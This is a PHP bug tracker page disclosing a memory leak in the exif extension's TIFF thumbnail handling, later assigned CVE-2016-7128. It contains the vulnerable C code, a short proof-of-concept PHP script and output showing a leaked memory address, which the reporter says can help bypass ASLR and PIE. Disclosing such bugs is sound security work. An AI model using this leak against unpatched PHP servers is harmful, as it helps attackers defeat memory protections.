|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-08-08 07:51 UTC] stas@php.net
-PHP Version: 7.0.8
+PHP Version: 5.6.24
-Assigned To:
+Assigned To: stas
[2016-08-08 07:51 UTC] stas@php.net
[2016-08-08 07:59 UTC] nguyenvuhoang199321 at gmail dot com
[2016-08-15 06:04 UTC] stas@php.net
-CVE-ID:
+CVE-ID: needed
[2016-08-17 05:51 UTC] stas@php.net
-Type: Security
+Type: Bug
[2016-08-17 05:51 UTC] stas@php.net
-Type: Bug
+Type: Security
-Private report: No
+Private report: Yes
[2016-08-17 06:40 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-08-17 06:40 UTC] stas@php.net
[2016-08-17 08:23 UTC] stas@php.net
[2016-08-17 08:23 UTC] stas@php.net
[2016-08-17 09:15 UTC] laruence@php.net
[2016-08-17 09:15 UTC] laruence@php.net
[2016-08-17 12:04 UTC] ab@php.net
[2016-08-17 19:10 UTC] kalle@php.net
[2016-08-18 11:15 UTC] tyrael@php.net
[2016-09-05 15:28 UTC] remi@php.net
-CVE-ID: needed
+CVE-ID: 2016-7128
[2016-10-10 11:17 UTC] krakjoe@php.net
[2016-10-17 10:09 UTC] bwoebi@php.net
[2016-10-17 10:09 UTC] bwoebi@php.net
[2017-01-12 09:12 UTC] krakjoe@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Apr 18 13:01:27 2024 UTC |
Description: ------------ I found some vulnerable code that leads to the memory leak in exif_process_IFD_in_TIFF. Let take look at code chunk : ``` if (!ImageInfo->Thumbnail.data && ImageInfo->Thumbnail.offset && ImageInfo->Thumbnail.size && ImageInfo->read_thumbnail) { ImageInfo->Thumbnail.data = safe_emalloc(ImageInfo->Thumbnail.size, 1, 0); php_stream_seek(ImageInfo->infile, ImageInfo->Thumbnail.offset, SEEK_SET); fgot = php_stream_read(ImageInfo->infile, ImageInfo->Thumbnail.data, ImageInfo->Thumbnail.size); if (fgot < ImageInfo->Thumbnail.size) { EXIF_ERRLOG_THUMBEOF(ImageInfo) } exif_thumbnail_build(ImageInfo); } ``` Because lack of checking ImageInfo->Thumbnail.offset if an attack set ImageInfo->Thumbnail.offset larger than ImageInfo->FileSize then *php_stream_read* return 0 to fgot, because EXIF_ERRLOG_THUMBEOF was defined as : ``` #define EXIF_ERRLOG_THUMBEOF(ImageInfo) exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_WARNING, "%s", EXIF_ERROR_THUMBEOF); ``` As you can see there is no exit after this error is output. After that exif_thumbnail_build(ImageInfo) is called. Because this thumbnail I applied is IMAGE_FILETYPE_JPEG so exif_thumbnail_build will return without error. Finally ImageInfo->Thumbnail.data is no fill by user data that lead to information leak like below, an attacker can leak address and then use it to bypass some protection such as PIE, ASLR,... Here the tiff file : https://drive.google.com/open?id=0B0D1DYQpkA9UVGE5QlJaNnIxb1E Affect : Linux, Mac Os X Test script: --------------- <?php $exif = exif_read_data('exif/gen.tiff',0,0,true); var_dump($exif); $thumb = $exif['THUMBNAIL']['THUMBNAIL']; echo bin2hex($thumb); ?> Actual result: -------------- $./php exif.php Warning: exif_read_data(gen.tiff): Thumbnail goes IFD boundary or end of file reached in /vagrant_extend/audit/exif.php on line 2 Warning: exif_read_data(gen.tiff): Error in TIFF: filesize(x04E2) less than start of IFD dir(x829A0004) in /vagrant_extend/audit/exif.php on line 2 array(11) { ["FileName"]=> string(8) "gen.tiff" ["FileDateTime"]=> int(1468986539) ["FileSize"]=> int(1250) ["FileType"]=> int(7) ["MimeType"]=> string(10) "image/tiff" ["SectionsFound"]=> string(30) "ANY_TAG, IFD0, THUMBNAIL, EXIF" ["COMPUTED"]=> array(10) { ["html"]=> string(24) "width="128" height="132"" ["Height"]=> int(132) ["Width"]=> int(128) ["IsColor"]=> int(0) ["ByteOrderMotorola"]=> int(0) ["ApertureFNumber"]=> string(5) "f/1.0" ["Thumbnail.FileType"]=> int(2) ["Thumbnail.MimeType"]=> string(10) "image/jpeg" ["Thumbnail.Height"]=> int(132) ["Thumbnail.Width"]=> int(128) } ["XResolution"]=> string(21) "1414812756/1414812756" ["THUMBNAIL"]=> array(5) { ["ImageWidth"]=> int(128) ["ImageLength"]=> int(132) ["JPEGInterchangeFormat"]=> int(1280) ["JPEGInterchangeFormatLength"]=> int(200) ["THUMBNAIL"]=> string(200) "" # leak leak } ["ExposureTime"]=> string(21) "1414812756/1414812756" ["FNumber"]=> string(21) "1414812756/1414812756" } 00c2a7081e7f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 => leak leak (00c2a7081e7f => 0x7f1e08a7c200)